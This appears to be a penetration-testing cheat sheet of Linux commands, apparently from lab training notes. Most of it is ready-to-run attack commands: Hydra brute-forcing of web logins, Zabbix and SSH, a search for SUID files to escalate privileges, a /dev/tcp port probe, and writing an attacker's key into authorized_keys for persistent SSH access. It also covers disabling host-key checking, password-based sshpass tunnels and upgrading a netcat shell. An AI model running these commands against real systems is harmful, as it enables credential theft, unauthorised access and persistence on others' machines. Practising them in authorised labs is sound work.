Linux

Generate /etc/shadow Password

openssl passwd -6 -salt salty Password123$
genpasswd() { openssl passwd -6 -salt $1 $2 }
genpasswd salty Password123$

Extract all URLs

grep -Eo "https?://[a-zA-Z0-9./?=_%:;#&-]*" inlanefreight | sort -u
...
https://www.inlanefreight.com/index.php/wp-json/
https://www.inlanefreight.com/index.php/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.inlanefreight.com%2F
https://www.inlanefreight.com/index.php/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.inlanefreight.com%2F&format=xml
https://www.inlanefreight.com/index.php/wp-json/wp/v2/pages/7
https://www.inlanefreight.com/wp-content/themes/ben_theme/css/animate.css?ver=5.6.14
...

Hydra

HTTP Form Login

hydra -l <username> -P <path/to/passwords> <IP> http-post-form "/route/to/login:username=^USER^&password=^PASS^:<Message If Login Is Incorrect>"

Use login as password

hydra -L users.txt -e s 10.129.1.198 http-post-form '/zabbix/index.php:name=^USER^&password=^PASS^&autologin=1&enter=Sign+in:is incorrect'

SSH

hydra -l <username> -P <path/to/passwords> <IP> ssh -t 4

Find all the SUID/SGID executables

# Find SUID files
find / -perm -4000 -type f -ls 2>/dev/null

# Find SUID files for USER
find / -perm -4000 -type f -user USER -ls 2>/dev/null

# Find SUID files for GROUP
find / -perm -4000 -type f -group GROUP -ls 2>/dev/null

# Find SUID files for USER or GROUP
find / -type f -a \( -perm -u+s -o -perm -g+s \) -ls 2>/dev/null

Port Scan with Bash

host='1.2.3.4' # IP or Host
port='80'
(echo >/dev/tcp/${host}/${port}) &>/dev/null && echo "open" || echo "closed"

SSH

Upgrade to SSH

Local

ssh-keygen -f id_rsa -P x -q
echo "mkdir ~/.ssh; echo '$(cat id_rsa.pub)' > ~/.ssh/authorized_keys"

Remote

mkdir ~/.ssh; echo 'ssh-ed25519 AAAAC3NzaC1lZDI1...wfXNOycqlPRe user@host' > ~/.ssh/authorized_keys

Always agree to PublicKey on ssh connect

└─$ cat ~/.ssh/config
Host *
    StrictHostKeyChecking no
    UserKnownHostsFile=/dev/null

Connect to ssh with password

# Just connect
sshpass -p 'Password123$' ssh user@domain.tld

# Connect and perform port forwarding from remote to local
sshpass -p 'Password123$' ssh user@domain.tld -L 8500:0:8500

Note:Also works with other services like ftp

Upgrade netcat (nc)

  1. Get PTY

    • python3 -c 'import pty;pty.spawn("/bin/bash")'

      • or

    • script /dev/null -qc /bin/bash

  2. Background the process

    • Ctrl+Z

  3. Get your terminals rows and columns

    • tput lines;tput cols

  4. Enter command and then press ENTER twice to bring the session back

    • stty raw -echo;fg

  5. For better text wrapping

    • stty rows <rows> cols <columns>

  6. To be able to use the clear command

    • export TERM=xterm

python3 -c 'import pty;pty.spawn("/bin/bash")'
script /dev/null -qc /bin/bash
---
stty raw -echo;fg;

stty rows 47 cols 211;export TERM=xterm

Note:This doesn't work with rlwrap!

PreviousEtcNextWeb

Last updated